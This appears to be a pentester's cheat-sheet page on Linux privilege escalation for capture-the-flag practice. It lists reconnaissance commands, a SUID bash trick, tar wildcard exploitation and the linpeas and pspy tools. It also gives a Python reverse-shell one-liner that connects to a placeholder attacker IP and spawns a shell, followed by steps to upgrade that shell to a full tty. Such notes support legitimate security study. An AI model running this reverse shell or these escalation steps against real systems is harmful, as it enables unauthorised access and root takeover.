Linux Privilege Escalation

Get tty (text terminal)

Create another netcat listener as below

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("<Kali IP>",4242));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

However this shell still won’t do what we want it to, so we need to get full tty for an interactive shell.

python -c 'import pty; pty.spawn("/bin/bash")'

or 

python3 -c 'import pty; pty.spawn("/bin/bash")'
export TERM=xterm // give us access to term commands such as clear.

Optional if phase 2 not make the job done. Press CTRL+Z to put the shell in the background. Next, type this command in the same window: stty raw -echo;fg. This will bring your shell back to the foreground with a fully interactive experience.

https://blog.ropnop.com/upgrading-simple-shells-to-fully-interactive-ttys

Gather Infos and spiking

history check users, architecture and services

su user login with another user

sudo -l check what files current user could run as root

cat /etc/crontab crontab -l cron is your friend

ls -l /bin/bash /bin/bash -p an easy win

sudo -u user command run command as other users

https://www.cyberciti.biz/open-source/command-line-hacks/linux-run-command-as-different-user/https://www.oreilly.com/library/view/linux-security-cookbook/0596003919/ch05s03.html

Exploiting SUID Executables(bash, binary)

Exploit tar wildcards

https://www.helpnetsecurity.com/2014/06/27/exploiting-wildcards-on-linux/

Automatic tools and observe

./linpeas.sh | tee linlog.txt or pspy

Other Dirty Tricks

Expand knowledge and cheatsheet

PreviousHydraNextTryHackMe Writeups

Last updated

Was this helpful?